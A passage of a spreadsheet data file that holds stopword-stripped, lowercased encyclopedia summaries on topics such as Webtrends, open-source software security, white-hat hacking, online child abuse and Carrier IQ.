    <t>operation bayonet multinational enforcement operation culminating 2017 targeting alphabay hansa darknet markets. many darknet markets also shut down. references</t>
  </si>
  <si>
    <t>All You're Wiki</t>
  </si>
  <si>
    <t>Webtrends</t>
  </si>
  <si>
    <t>webtrends private company headquartered portland, oregon, united states. provides digital analytics, optimization software related digital marketing e-commerce. provides services approximately 2,000 companies. history glen boyd shapira founded company 1993 "e.g. software".netiq bought company 2001. 2002, netiq released version webtrends reporting center (version 5.0). netiq sold webtrends 2005.on october 2007, three corporate vice presidents asked resign. although initial speculation company quickly sold largest competitor, later reports indicated change signaled long-term move. february 2014, company hired davis ceo. 2014, company moved headquarters pacific first center u.s. bancorp tower downtown portland. impact 2009, webtrends launched transit campaign revolving around whether cyclists road tax. asked, "should cyclists road tax?". both drivers cycling community reacted strongly strident opinion sides debate. campaign demonstrate ability company's analytics track resulting online commentary around issue. acquisitions webtrends acquired clickshift, automated optimization product online advertising, december 2006. clickshift's technology integrated webtrends' marketing suite, includes analytics marketing warehouse products. offering re-branded webtrends dynamic search. august 2008, product relaunched webtrends director.webtrends acquired seattle based widemile, provider multivariate testing targeting july 2009. product rebranded relaunched webtrends optimize acquisition made public.webtrends acquired francisco based transpond, maker social microsites applications distributed facebook, august 2010. product rebranded webtrends apps time announcement later rebranded webtrends social.webtrends acquired reinvigorate culver city, based media temple ventures. reinvigorate developed real time analytics product visit heat mapping technologies. product rebranded webtrends reinvigorate later discontinued. products webtrends offers variety analytics products services focus collection presentation user behavior data websites mobile device applications. york times described company's offerings "products analyze spending site visitors."the core product, webtrends analytics, available software software service (saas) models. over years, webtrends released number saas products including webtrends segments, webtrends optimize, action center, webtrends streams webtrends ads. 2012 "integration" deal linked webtrends hootsuite.their 2013-released email remarketing tool helps online marketers deal in-the-moment data abandonment virtual shopping carts potential customers.in february 2015, webtrends completed worldwide rollout webtrends explore, ad-hoc analytics application.in 2016, webtrends announced would release analytics product, webtrends infinity analytics; year later sold oracle.on august 2018, management buy-out testing/personalisation offering webtrends optimize spin company. became headquartered headed former director optimisation services matthew smith, took role ceo. following split, optimize product rebranded, re-platformed, operating ever since. data collection their software uses file analysis page tagging. analysis reads files server records transactions. page tagging, parameter name–value pairs appended (either automatically javascript "tag" manual hand-coding) query string image resides data collection server. when visitor loads page browser, browser sends request data collection server load image. data collection server receives request logs parameters included query string image. software analyzes organizes captured data reports configured 'profile'. reports viewable various means, commonly web-based graphic user interface scheduled emailed export report format. collected data also viewed file delivery, rest odbc queries, products webtrends data extraction api. web-based report presentation interface highly configurable, allowing webtrends administrator specify information analyzed, presented, available viewing. 2008 york times, already owned international herald tribune, used webtrends analyze visitors site arrived. data collection process facilitated finding importance search engines. references</t>
  </si>
  <si>
    <t>Virtual machine lifecycle management</t>
  </si>
  <si>
    <t>virtual machine lifecycle management class management looks life cycle virtual machine viewpoint application focused roles within organization. number major software vendors, including microsoft novell, begun release software products aiming simplifying administration larger virtual machine deployments. environmental characteristics virtualized environments fundamentally different physical environments architecture capabilities. flexibility provide derived three fundamental characteristics: time: over time, topology environment changes machines coming online others going offline. motion: unlike physical servers, virtual machines easily relocate around data-center. transparency: with physical presence, virtual machines cannot seen, identified, touched often, missed. effects these characteristics come together define benefits virtualization, cost-savings disaster recovery. however, also change nature management infrastructure itself. emerging space virtual machine lifecycle management result time, motion transparency qualities virtual environments. this need cuts across software development operations, encompassing segments itil framework: service strategy virtualization extends transparent back-end alternative full infrastructure offering within organization, virtual machine lifecycle management provides granular controls enable wholly delivery models, short-term provisioning outsourced virtual machine hosting. service design when designing virtual infrastructure services, administrators consider structure individual virtual machine given customer well interactions virtual machines environment, come online, move, expire service transition virtual machine lifecycle management augments traditional requirements built delivering infrastructure component business. best practices specific tools used create right controls within virtual machine, ensuring behavior machines line design. service operation once operational, virtual environments extraordinarily dynamic, design. above beyond complexity traditional operating environment, management needs minimized strong controls transition phase ongoing monitoring alerting specifically designed address unique characteristics virtual infrastructure. continual service improvement virtual environments mature grow, internal customers management keen understand savings benefits paradigm, security groups increasingly audit infrastructure, chargeback methods emerge account model. virtual machine lifecycle management tools, innate understanding environment transient mobile nature, deliver metrics needed demonstrate success constituents. references external links what take manage virtual servers? denise dubie, network world, 11/01/07</t>
  </si>
  <si>
    <t>Open-source software security</t>
  </si>
  <si>
    <t>open-source software security measure assurance guarantee freedom danger risk inherent open-source software system. implementation debate benefits proprietary software forces user accept level security software vendor willing deliver accept rate patches updates released. assumed compiler used creates code trusted, demonstrated thompson compiler subverted using compiler backdoor create faulty executables unwittingly produced well-intentioned developer. with access source code compiler, developer least ability discover mal-intention. kerckhoffs' principle based idea enemy steal secure military system able compromise information. ideas basis many modern security practices, followed security obscurity practice. drawbacks simply making source code available guarantee review. example occurring marcus ranum, expert security system design implementation, released first public firewall toolkit. time, 2,000 sites using toolkit, people gave feedback patches. having large amount eyes reviewing code "lull user false sense security". having many users look source code guarantee security flaws found fixed. metrics models there variety models metrics measure security system. these methods used measure security software systems. number days vulnerabilities argued system vulnerable potential vulnerability discovered, patch created. measuring number days vulnerability vulnerability fixed, basis determined security system. there caveats approach: every vulnerability equally bad, fixing bugs quickly might better finding taking little longer them, taking account operating system, effectiveness fix. poisson process poisson process used measure rates different people find security flaws open closed source software. process broken number volunteers paid reviewers rates volunteers find flaw measured rate paid reviewers find flaw measured expected time volunteer group expected find flaw 1/(nv expected time paid group expected find flaw 1/(np λp). morningstar model comparing large variety open source closed source projects star system could used analyze security project similar morningstar, inc. rates mutual funds. with large enough data set, statistics could used measure overall effectiveness group other. example system follows: star: many security vulnerabilities. stars: reliability issues. stars: follows best security practices. stars: documented secure development process. stars: passed independent security review. coverity scan coverity collaboration stanford university established baseline open-source quality security. development completed contract department homeland security. they utilizing innovations automated defect detection identify critical types bugs found software. level quality security measured rungs. rungs definitive meaning, change coverity releases tools. rungs based progress fixing issues found coverity analysis results degree collaboration coverity. they start rung currently rung rung 0the project analyzed coverity's scan infrastructure, representatives open-source software come forward results. rung rung collaboration coverity development team. software analyzed subset scanning features prevent development team overwhelmed. rung 2there projects analyzed upgraded status rung reaching zero defects first year scan. these projects include: amanda, ntp, openpam, openvpn, overdose, perl, php, postfix, python, samba, tcl. media number podcasts cover open-source software security: open source security podcast www.opensourcesecuritypodcast.com linux security podcast https://www.atomicorp.com/linux-security-podcast/ also open source security foundation references external links bruce schneier: "open source security", crypto-gram newsletter, september 1999 messmer, ellen. (2013). "security open-source software scrutinized". network world, 30(5), 12-12,14. (article magazine) census project core infrastructure initiative linux foundation</t>
  </si>
  <si>
    <t>BLADE (software)</t>
  </si>
  <si>
    <t>blade (block drive-by download exploits) computer program developed phillip porras vinod yegneswaran international; long wenke georgia institute technology. blade funded grants national science foundation, united states army research laboratory, office naval research. program designed prevent drive-by download malware attacks. references external links official website</t>
  </si>
  <si>
    <t>Online Abuse Prevention Initiative</t>
  </si>
  <si>
    <t>online abuse prevention initiative (oapi) non-profit organization whose study combat abuse internet. history oapi founded 2015 randi harper, crash override network's quinn alex lifschitz stated serving inaugural board directors. march 2015 quinn announced formal partnership organizations. activities stated goals oapi study online abuse, reduce mitigate technical measures collaboration tech companies. first public campaign open letter icann, organization responsible coordinating internet's domain name system, opposing latter's plans anonymity whois records commercial websites. oapi argues icann's proposals make easier abusers physically endanger domain name registrants doxxing swatting, marginalized race, gender, sexual orientation disproportionately risk. letter attracted signatures support fifty organizations supporting online privacy protection at-risk communities, including electronic frontier foundation, project, national coalition against domestic violence. references external links official website online abuse prevention initiative facebook</t>
  </si>
  <si>
    <t>Privilege revocation (computing)</t>
  </si>
  <si>
    <t>privilege revocation entity giving some, privileges possess, authority taking (privileged) rights away. information theory honoring principle least privilege granularity provided base system sandboxing point successful) attacks unprivileged user account helps reliability computing services provided system. chances restarting process better, services machine affected least probably much alternative case: i.e. privileged process gone haywire instead). computer security computing security privilege revocation measure taken program protect system misuse itself. privilege revocation variant privilege separation whereby program terminates privileged part immediately served purpose. program revoke privileges, risks escalation privileges. revocation privileges technique defensive programming. references protection profile privilege-directed content authoriszor ltd, ref: auth_cc/pp/des/01, issue 1.3, december 2000 lomac: water-mark integrity protection cots environments timothy fraser</t>
  </si>
  <si>
    <t>White pages schema</t>
  </si>
  <si>
    <t>white pages schema data model, specifically logical schema, organizing data contained entries directory service, database, application, address book. white pages directory, entry typically represents individual person makes network resources, receiving email account system. environments, schema also include representation organizational divisions, roles, groups, devices. term derived white pages, listing individuals telephone directory, typically sorted individual's home location (e.g. city) name. while many telephone service providers decades published list subscribers telephone directory, similarly corporations published list employees internal directory, rise electronic mail systems requirement standards electronic exchange subscriber information different systems appeared. white pages schema typically defines, real-world object represented: attributes object represented entry object relationships object objects represented entry named entry located client searching similar entries distinguished entries ordered displayed listone earliest attempts standardize white pages schema electronic mail x.520 x.521, part x.500 specifications, derived addressing requirements x.400 defined directory information tree mirrored international telephone system, entries representing residential organizational subscribers. this evolved lightweight directory access protocol standard schema 2256. widely deployed white pages schemas used ldap representing individuals organizational context inetorgperson, defined 2798, although versions active directory require different object class, user. many large organizations also defined white pages schemas employees customers, part identity management architecture. converting data bases directories using different schemas often function metadirectory, data interchange standards common indexing protocol. some early directory deployments suffered poor design choices white pages schema, attributes used naming purposes non-unique large environments (such person's common name) attributes used naming purposes likely change (such surnames) attributes included could lead identity theft, social security number users required provisioning choose attributes unique still memorable themnumerous proposed schemas exist, standalone definitions suitable general purpose directories, embedded network protocols. examples generic white pages schemas include vcard, defined 2426, foaf. also recognition human individuals</t>
  </si>
  <si>
    <t>Online Armor Personal Firewall</t>
  </si>
  <si>
    <t>online armor personal firewall firewall originally developed australian company ((tall emu)), program sold emsi software gmbh (now emsisoft). program provides protection microsoft windows operating system inbound outbound attacks. there three editions product: online armor free freeware licensed personal limited featureset. online armor premium comprehensive commercial firewall includes anti-phishing anti-spam capabilities. overview independent proactive security challenge test performed matousec.com, online armor premium received score 99%, surpassing well-known firewalls, zonealarm kaspersky internet security. well known vulnerability profiling site company, secunia, found vulnerabilities march, 2008 software, though matousec reported weakness march 2008 repaired latest version. online armor gained negative positive feedback users reporting serious compatibility problems certain programs, f-secure muncher, noted product website, also receiving praise free online support swift response problems. support march 2015 emsisoft announced discontinued selling licenses online armor, would possible activate license keys 2015, support online armor would officially march 2016. also internet security comparison antivirus software comparison firewalls references external links official product website official company website</t>
  </si>
  <si>
    <t>White hat (computer security)</t>
  </si>
  <si>
    <t>white white-hat hacker, whitehat) ethical security hacker. ethical hacking term meant imply broader category penetration testing. under owner's consent, white-hat hackers identify vulnerabilities current system has. white contrasted black hat, malicious hacker; definitional dichotomy comes western films, heroic antagonistic cowboys might traditionally wear white black hat, respectively. there third kind hacker known grey hacks good intentions times without permission.white-hat hackers also work teams called "sneakers and/or hacker clubs", teams, tiger teams. history first instances ethical hack used "security evaluation" conducted united states force, multics operating systems tested "potential two-level (secret/top secret) system." evaluation determined multics "significantly better conventional systems," also "... vulnerabilities hardware security, software security procedural security" could uncovered relatively level effort." authors performed tests guideline realism, results would accurately represent kinds access intruder could potentially achieve. they performed tests involving simple information-gathering exercises, well outright attacks upon system might damage integrity; results interest target audience. there several unclassified reports describing ethical hacking activities within military. 1981 york times described white-hat activities part "mischievous perversely positive 'hacker' tradition". when national employee revealed existence password cracker, used customer accounts, company chastised writing software disclosing sooner. letter reprimand stated "the company realizes benefit ncss fact encourages efforts employees identify security weaknesses directory, sensitive software files".the idea bring tactic ethical hacking assess security systems formulated farmer wietse venema. with goal raising overall level security internet intranets, proceeded describe able gather enough information targets able compromise security chosen they provided several specific examples information could gathered exploited gain control target, attack could prevented. they gathered tools used work, packaged single, easy-to-use application, gave away anyone chose download their program, called security administrator tool analyzing networks, satan, great amount media attention around world 1992. tactics while penetration testing concentrates attacking software computer systems start scanning ports, examining known defects protocols applications running system patch installations, example ethical hacking include things. full-blown ethical hack might include emailing staff password details, rummaging executive's dustbins usually breaking entering, without knowledge consent targets. only owners, ceos board members (stake holders) asked security review magnitude aware. replicate destructive techniques real attack might employ, ethical hackers arrange cloned test systems, organize hack late night systems less critical. recent cases hacks perpetuate long-term (days, weeks, long-term human infiltration organization). some examples include leaving usb/flash drives hidden auto-start software public area someone lost small drive unsuspecting employee found took some methods carrying include: disk memory forensics attacks frameworks metasploit network security reverse engineering security scanners burp suite nessus w3af social engineering tactics training platforms vulnerability researchthese methods identify exploit known security vulnerabilities attempt evade security gain entry secured areas. they able hiding software system 'back-doors' used link information access non-ethical hacker, also known 'black-hat' 'grey-hat', want reach. legality struan robertson, legal director pinsent masons llp, editor out-law.com, says "broadly speaking, access system authorized, hacking ethical legal. isn't, there's offence computer misuse act. unauthorized access offence covers everything guessing password, accessing someone's webmail account, cracking security bank. maximum penalty unauthorized access computer years prison fine. there higher penalties years prison hacker also modifies data". unauthorized access even expose vulnerabilities benefit many legal, says robertson. "there's defense hacking laws behavior greater good. even believe." employment united states national security agency offers certifications cnss 4011. such certification covers orderly, ethical hacking techniques team-management. aggressor teams called "red" teams. defender teams called "blue" teams. when agency recruited 2012, promised applicants few, shall say, indiscretions past, alarmed. automatically assume hired".a good "white hat" competitive skillful employee enterprise since countermeasure find bugs protect enterprise network environment. therefore, good "white hat" could bring unexpected benefits reducing risk across systems, applications, endpoints enterprise. also bounty program risk malwaremustdie wireless identity theft references</t>
  </si>
  <si>
    <t>Online Hate Prevention Institute</t>
  </si>
  <si>
    <t>online hate prevention institute (ohpi) independent harm prevention charity established 2012 based australia. overview ohpi recognised government australia harm prevention charity, listed harm prevention register department families, housing, community services indigenous affairs. ohpi tackles wide variety forms online hate speech. work antisemitism undertaken global forum combating antisemitism, work islamophobia used organisation islamic cooperation. institute recommended source specialist information cyber racism australian human rights commission, esafety commissioner.the harm prevention charity also publishes range briefings reports documenting examples online hate. during coronavirus (covid-19) pandemic, ohpi published special series reports documenting slew hate speech targeting people asian descent misinformation surrounding origin virus. notable events july 2014, andre oboler accused facebook refusing enforce community standards allowing hate speech remain online, stating content removed country report originated still visible others viewed overseas.after facebook decided remove holocaust denial content october 2020, oboler welcomed cautious optimism shift policy platform. oboler called changes "certainly welcome" daily, mentioned public "[wait] delivered make sure change words."oboler presented asia pacific regional forum hate speech, social media minorities october 2020. forum, organised lantos institute united nations human rights special rapporteur, sought address human rights greater asia-pacific. oboler spoke alongside representatives twitter asia centre.oboler presented united nation's thirteenth session forum minority issues november 2020. forum focused theme hate speech, social media minorities organised united nations human rights special rapporteur minority issues. oboler's presentation part agenda item "towards safer space minorities: positive initiatives address online hate speech: role national human rights institutions, human rights organizations, civil society stakeholders" represented civil society alongside commissioner human rights commission malaysia director facebook oversight board administration. among recommendations, oboler called governments support wider program work civil society tackle online hate.the inter-parliamentary task force online antisemitism would also feature oboler late 2020, alongside congresswoman former democratic national committee chair debbie wasserman schultz, member parliament josh burns, former canadian member parliament michael levitt, among many others. task force addressed vulnerability jewish communities, nature online semitism recommendations makers social media platforms. fight against hate online hate prevention institute developed based application titled fight against hate track response times social networks facebook, twitter youtube responding reports hate speech. references external links online hate prevention institute website fight against hate website</t>
  </si>
  <si>
    <t>RancherOS</t>
  </si>
  <si>
    <t>rancher labs open source software company based cupertino, california. company helps manage kubernetes scale. rancher labs founded 2014 30,000 active teams. rancher labs funded million 2015, million 2016, million 2020. executives include co-founders sheng liang (ceo), shannon williams, darren shepherd, will chan. company's headquarters cupertino, california.in 2020, rancher labs launched rancher academy, free training program professionals certified range technologies company provides various distributions kubernetes. company president shannon williams says rancher labs trying democratize access kubernetes training time many organizations still can’t find staff appropriate skills, even wake economic downturn brought covid-19 pandemic. recently released dice 2020 tech report found increase demand individuals kubernetes skills past year alone. dice predicts demand kubernetes skills enjoy projected growth rate next years. april 2020, rancher labs released update kubernetes management platform makes easier upgrade without downtime addition making easier remotely access. company sheng liang says organizations increasingly operationalize kubernetes focus lifecycle management scalability. version rancher provides access tools makes easier teams manage fleet kubernetes clusters even network connectivity limited, says liang. teams now, example, initiate upgrade remotely, processes executed locally. once completed, remote cluster synchronizes management server connectivity re-established. july 2020, rancher labs announced definitive agreement acquired suse. deal closed december 2020. references external links official website rancher github</t>
  </si>
  <si>
    <t>Online child abuse</t>
  </si>
  <si>
    <t>online child abuse unique form child abuse also known “cyber molestation” virtual, distanced, anonymous nature. such abuse happen face-to-face, necessarily require physical contact. however, online abuse result negative face-to-face consequences form statutory rape, forcible sexual assault, harassment, etc. united states, online child abuse recognized form child abuse national society prevention cruelty children.online abuse children occur variety forms. including, limited, cyber-bullying, grooming, sexual abuse. such abuse requires world wide cellphones, increasing significance increasingly technological world. perpetrator online abuse stranger someone previously known victim. report data society research institute center innovative public health research showed u.s. internet users witnessed form online harassment abuse, personally experienced this study found distinction genders respect harassment, deduced women risk wider variety online abuse.governments across world acknowledged importance recognizing combating online abuse children. united states effort internet crimes against children task force. this task force consists individual task forces engaging 4,500 federal, state, local law-enforcement agencies goal combating online abuse children. cyber-bullying cyber-bullying, internet bullying, occurs individual group electronically distributes negative, false, otherwise harmful content individual group using personal private information causes humiliation distress individual. cyber-bullying happen device able connect internet (desktop, mobile devices, gaming devices, etc.) cellphones require perpetrator vicinity victim. cyber-bullying especially prevalent among children extension bullying within schools. canadian research study found children victims cyber-bullying also bullied school likely bully others cyberspace.cyber bullying happens social media, messaging gaming platforms. main objective cyber bullying anger, shame, scare threaten users evalence prevalence studies show rising trend online bullying. although remains least-reported form bullying relatively hidden believed under-reported. because victims often cannot evade cyber-bullies, harbor feelings guilt, incompetence despair. upwards victims cyber-bullying report abuse. according statistics cyber-bullying i-safe foundation, adolescents victims cyber-bullying, one-third threatened online. roughly equal number admit engaged perpetrating cyber-bullying themselves. victims reported abuse, reported repeated cyber-bullying. harford county examiner reported child victims issue parents occurred. examination reported youths damaging photos taken without permission, girls likely involved cyber-bullying boys, bullies victims. different social groups ages tend receive differing amounts unwanted negative feedback. example, reported 55.2% young lgbtq community members victims cyber-bullying. another trend shows school-aged children likely victims online abuse. variation study 2011 found three primary reasons targeting others internet: informal social control, dominance, entertainment. informal social control applying pressure change another person's behavior. dominance refers attempt(s) hurting someone, humiliating someone, gaining access personal information (secrets, explicit photos, etc.). entertainment refers commonly known trolling: purposefully humiliating, annoying, bothering someone purpose eliciting emotional response bully's enjoyment. perpetrators trolling called trolls, subset cyberbullies. effects cyber-bullying common among children young adults eighteen years old. victims cyber-bullying, often feel negative bullied. also common cyber-bullying negative effects cyber victims' social well-being negative impact self-esteem. another consequence cyber-bullying cyber victim fear safety. further research conducted patchin hinduja (2010) found involved cyber-bullying, perpetrators, victims, both, significantly lower self-esteem little exposure cyber-bullying. kowalski limber (2013) also found bullies victims negative scores measures psychological health, physical, health, academic performance. laws united states united states, parents encouraged monitor children's online activity deal cyber-bullying appropriately. cyber-bullying involves sexual content sexting, however, cyberbully parents also subject legal consequences, including registered sexual offenders. cyber-bullying involve explicit sexual content difficult prosecute federal laws directly protecting children direct forms cyber-bullying. cases cyber-bullying difficult pursue united states infringement first amendment rights (i.e.: freedom speech).u.s. schools take action incidents occur outside school either clear 'disruption educational process' 'true' threat more) students. expression considered 'true' threat, federal court must determine "whether reasonable person would foresee statement would interpreted maker communicates statement serious expression intent harm assault". cyberbulling increasingly recognized nationwide issue united states, whether public schools limit students' speech outside school hours becoming issue.high-profile cases cyberbullying brought attention state local legislatures, u.s. states implemented laws online communication aims cause humiliation, emotional distress, fright. prosecution cyber-bullying cases usually combination civil laws best nature individual case. most states anti-bullying laws policies, save arizona, arkansas, colorado, hawaii, mississippi, missouri, north carolina, texas. stopbullying.gov, federal agency tasked preventing forms bullying, created detailed list state laws policies. examples state anti-bullying campaign massachusetts aggression reduction center, provides curriculum educators cyber-bullying connection bullying inside schools.cyber-bullying specifically targeted federal megan meier cyber-bullying prevention introduced house representatives 2009. this prevention sought amend federal criminal code impose criminal penalties anyone transmits interstate foreign commerce communication intended coerce, intimidate, harass, cause substantial emotional distress another person, using electronic means support severe, repeated, hostile behavior. this result suicide megan meier 2006. megan victim cyber-bullying mother teen daughter, resulted megan committing suicide home missouri. grooming grooming phenomenon occur offline. official definition grooming used u.s. department justice method used offenders involves building trust child adults around child effort gain access time alone her/him. extreme cases, offenders threats physical force sexually assault abuse child... offender assume caring role, befriend child even exploit position trust authority groom child and/or child's family. these individuals intentionally build relationships adults around child seek child less supervised adults her/his life. this increases likelihood offender's time child welcomed encouraged. definition emphasizes child's family building trust child. when grooming occurs online, however, frequently done without knowledge compliance adult. when children internet without supervision, room potential abuse. online grooming driven variety things. most common online grooming build trusting relationship child order engage either online in-person sexual acts. internet used lead child potential sexual behavior. grooming also used forms exploitation child, blackmail monetary gain more. forms used combination, groomers convincing children perform sexual acts, sending nude photographs, blackmailing victim threatening release information them. variation online grooming occur variety ways. most commonly, chat rooms social networks used make initial contact possible victims. groomers also photo-sharing apps, dating apps, gaming websites find victims. after establishing online relationship, groomer turns conversations personal matters, frequently sexual topics. groomers engage sexual conversations victims, send nude photos videos, encourage sexual acts webcam, persuade victim meet person sexual acts. groomers exclusively strangers. they family friends individuals child primarily internet order strengthen relationship future exploitation child. individual groomers sex, gender, age. grooming considered complicated matter, groomers many tactics. groomers compliments make promises child order elicit certain behaviors. groomers also assert control child exploit natural sexual curiosity.frequently, groomers make fake profile order create persona likely trusted possible victims. such phenomenon known catfishing. definition catfish person sets false personal profile social networking site fraudulent deceptive purposes." although catfishing exclusively used online groomers, common groomers contact potential victim build trust more-trustworthy false identity. catfishing illegal united states, unlike identity theft, used method online grooming considered crime grooming. prevalence grooming overall online abuse children issue growing concern modern technological era. victims online grooming frequently young teens, majority victims ages 2012 literature review research area conducted various english scholarly institutions, found internet users aged 10–17 reported unwanted online sexual solicitation attempted grooming. laws united states united states, grooming considered federal offense. several federal laws include sections involving grooming. under section 2422 united states criminal code:(a) whoever knowingly persuades, induces, entices, coerces individual travel interstate foreign commerce, territory possession united states, engage prostitution, sexual activity person charged criminal offense, attempts shall fined title imprisoned years, both. whoever, using mail facility means interstate foreign commerce, within special maritime territorial jurisdiction united states knowingly persuades, induces, entices, coerces individual attained years, engage prostitution sexual activity person charged criminal offense, attempts shall fined title imprisoned less years life. u.s. association claims statute "targets sexual grooming minors well actual sexual exploitation them."because grooming's complex nature relationship trust groomer victim, grooming infrequently left unrecognized. only grooming results sexual acts adult minor, exchange sexual images, extortion money come eyes court. case shelly chartier, online grooming resulting crimes jail time. chartier, catfishing star chris andersen aspiring model paris dunn, groomed 17-year-old dunn exchanging nude photos sexual acts false identity andersen. sent images andersen impression receiving dunn dunn underage. chartier extorted money andersen, claiming would reveal possession child pornography unless paid her. chartier eventually caught faced months prison various crimes, including, limited extortion, impersonation, making threats. state legislatures, illinois, introduced language specifically includes electronic web-based methods grooming laws. non-governmental advocacy addition legislation, several non-governmental programs initiatives aimed issue. example, r.age, malaysian-based group journalists, aims spread information many important issues, including online safety occurrence online grooming, hopes "telling stories matter, make difference, hold people accountable, give voice one." addition, pandora's protect nonprofit organization aims provide support victims crimes online grooming assault. addition, spread information order prevent assaults. sexual abuse online sexual abuse relatively modern trend, perpetrators utilize modern forms technology live stream cameras, cell phones, social media coerce targeted victims inappropriate sometimes illegal acts. abusers discriminate target victims every walk life. online sexual abuse differs forms sexual abuse perpetrated stealthily global scale, allowing offender evade capture. time, technology offers predators greater opportunities find youth prey upon. children often targets online sexual predators often bully, emotionally manipulate, blackmail, befriend willing communicators order obtain desires. online sexual abuse vary personal interactions victim offender mechanized process, children sexually exploited perpetrators' profit. online sexual predators often target young victims, study showing children receive negative unwanted attention sexual nature internet. predators make contact prospective targets variety settings, although prolific place predators troll chat rooms, known first encounters online sexual predators occur. predators troll chat rooms forms social media like myspace facebook, seeking people outwardly share personal information.detection deterrence online sexual abuse difficult anonymous nature internet; however, stopping detecting online predator's criminal activity task various government organizations like federal bureau investigation (fbi). fbi's violent crimes against children program specifically created, "...to provide rapid, proactive, comprehensive counter threats abuse exploitation children" jurisdiction. accomplishes quick response times agents scouring internet search perpetrators; information forums chat-rooms look telltale signs abusive behavior children interact with. online sexual predators, however, often difficult distinguish show misleading representation avoid incriminating evidence. rather relying completely authorities apprehend perpetrators online sexual abuse, decrease chances unwanted unsolicited advances online predators keeping one's intimately private details internet. another avoid unwanted sexual solicitations ignore, block, report offender website's management staff. laws united states variety laws place deter online criminal activity pertaining sexual abuse. federal criminal code rules outlines variety rules regulations regarding sexual abuse title united states code. section 1462 titled importation transportation obscene matters, outlines would considered transporting obscene material internet. child pornography violates law, among others, code, "any obscene, lewd, lascivious, filthy book, pamphlet, picture, motion-picture film, paper, letter, writing, print, matter indecent character" subject fine imprisonment five years.online sexual offenders target children also fall jurisdiction section 2243 sexual abuse minor ward section 2251 sexual exploitation children could prosecuted full extent law. these sections outlined "...aggravated sexual abuse, sexual abuse, abusive sexual contact involving minor ward, trafficking children, production, possession, receipt, mailing, sale, distribution, shipment, transportation child pornography less years life carry] term years life." noted, sexual abuse children, whether online person, subject strict punishment law. examples online abuse often manifests physical psychological harm victims, previously stated. recent history, larry nassar, gymnastics team doctor, charged years federal prison pleaded guilty charges related receiving child pornography, possessing child pornography, destroying concealing evidence relating child pornography. prosecutors stated supremely close link child pornography activities directly impacted repeat, "molestation children". height child pornography obsession, nassar thousands pictures underage children. wake scandal, affecting hundreds women variety ages, reforms made combat future occurrences abuse gymnastics michigan state university. also gathering large following wake scandal movement. murder kacie woody occurred 13-year-old woody befriended thought 17-year-old named dave fagen yahoo! messenger, reality person 47-year-old pedophile named david fuller. after grooming woody social network, fuller traveled woody's home rural holland, arkansas abducted her. after woody reported missing investigation launched, arkansas enforcement agents located woody fuller's bodies storage unit conway. fuller bound raped woody inside rented minivan unit shooting head, shot head officers could arrest him. also child abuse cyberbullying references</t>
  </si>
  <si>
    <t>Cary Safe Company</t>
  </si>
  <si>
    <t>cary safe company defunct safe company established located buffalo, york. products company manufactured sold bank vaults, cabinets (safes), safe deposit boxes 1878 1929. majority safes sold cary letters painted purchaser's request upper portion safe. typically common customer's family name name business. every cary safe built fire burglar-proof. company also manufactured intricate time locks combination locks, (standard key) locks, prison cells. history although founded 1878, company incorporated 1889. members firm continued company.these members include: company also employed number traveling salesmen around united states. slogans popular company advertising slogans included: "growing great since seventy eight" cary safes "the safe investment" "uniform strength throughout" locations company's headquarters, included production office buildings, located 1/2-acre, three-story building, corner 250-266 chicago street 217–249 scott street. 1920s service sales building opened 1200 niagara street. references</t>
  </si>
  <si>
    <t>AAA (computer security)</t>
  </si>
  <si>
    <t>refers authentication identify), authorization give permission) accounting audit trail). framework used control track access within computer network. common network protocols providing functionality include tacacs+, radius, diameter. usage diameter cases, term used refer protocol-specific information. example, diameter uses scheme aaa, stands authentication, authorization accounting, diameter-based protocol aaas, stands authentication, authorization accounting secure transport. these protocols defined internet engineering task force 6733 intended provide authentication, authorization, accounting (aaa) framework applications, network access mobility local roaming situations.while term used narrow context, concept widely used within industry. result, incorrect refer diameter same. usage servers cdma networks servers cdma data networks entities provide internet protocol (ip) functionality support functions authentication, authorization accounting. server cdma wireless data network architecture similar cdma wireless voice network architecture. types servers include following: access network (an-aaa): communicates access network (an) enable authentication authorization functions performed interface an-aaa known interface. broker (b-aaa): acts intermediary proxy traffic roaming partner networks (i.e., h-aaa server home network v-aaa server serving network). b-aaa servers used networks enable providers offer billing settlement functions. home (h-aaa): server roamer's home network. h-aaa similar voice. h-aaa stores user profile information, responds authentication requests, collects accounting information. visited (v-aaa): server visited network roamer receiving service. v-aaa serving network communicates h-aaa roamer's home network. authentication requests accounting information forwarded v-aaa h-aaa, either directly b-aaa.current servers communicate using radius protocol. such, specifications refer servers radius servers. however, future servers expected successor protocol radius known diameter.the behavior servers (radius servers) cdma2000 wireless network specified tia-835. also layer cyberoam computer access control references</t>
  </si>
  <si>
    <t>Carrier IQ</t>
  </si>
  <si>
    <t>carrier privately owned mobile software company founded 2005 sunnyvale, california. provided diagnostic analysis smartphones wireless industry installation software user's phone, typically manner cannot removed without rooting phone. company says software deployed million devices worldwide. history company founded konstantin othmer spin-off core mobility company. through msip software "aggregates, analyzes, delivers data wireless carriers device manufacturers. this information proves valuable resource businesses understand quality service customers experience."on january 2009, mark quinlivan announced carrier received million series financing intel capital, presidio ventures, sumitomo corporation company.on february 2009, carrier announced partnership huawei technologies develop "new range data cards provide improved feedback mobile broadband user experience."on february 2009, carrier announced global partnership.on june 2009, carrier selected tie50 award winner "one hottest global emerging companies."on june 2010, bridgescale partners announced million series financing company.on october 2010, visionmobile announced carrier joined "100 million club" software installed million phones.on march 2011, carrier announced mobile intelligence technologies, including hspa+.on august 2011, operating partner mohr davidow ventures larry lenhart named ceo. announcement noted second quarter 2011 carrier passed petabyte milestone processed analytics data.on october 2011, carrier third party vendor nielsen company announced partnership analyzing data.on october 2011, named carrier "innovative business analytics company under $100m"on november 2011, trevor eckhart published report indicating carrier software capable recording various metrics, including user keystrokes.at mobile world congress 2012, carrier announced extension care product "customer-facing dashboard", relaying information they'd usually send wireless companies—such battery life, network coverage, app's effect phone performance, dropped calls coverage—directly consumers effort reduce technical support calls.on december 2015, reported at&amp;t inc. acquired carrier iq's software assets staff, effectively shutting company. at&amp;t customer carrier iq's several years, using software troubleshoot wireless quality customers' mobile phones. board directors board directors november 2011 were: larry lenhart, president (previously mohr davidow) bruce leak, co-founder webtv networks feiber, mohr davidow ventures martin gibson, accel partners bruce sachs, charles river ventures dominic endicott, nauta capital products agent software, typically pre-installed mobile devices handset manufacturers network operators, designed gather, store forward diagnostic measurements behalf. data available include metrics device (e.g., firmware, battery levels, application performance, performance) performance data voice data connectivity device radio towers. mobile device manufacturers network operators determine metrics actually collected, according criteria known "profile." agent software runs background, user usually aware presence unless implementation includes on-off switch.iq agent periodically uploads data carrier mobile service intelligence platform (msip) system, feeds network operator's 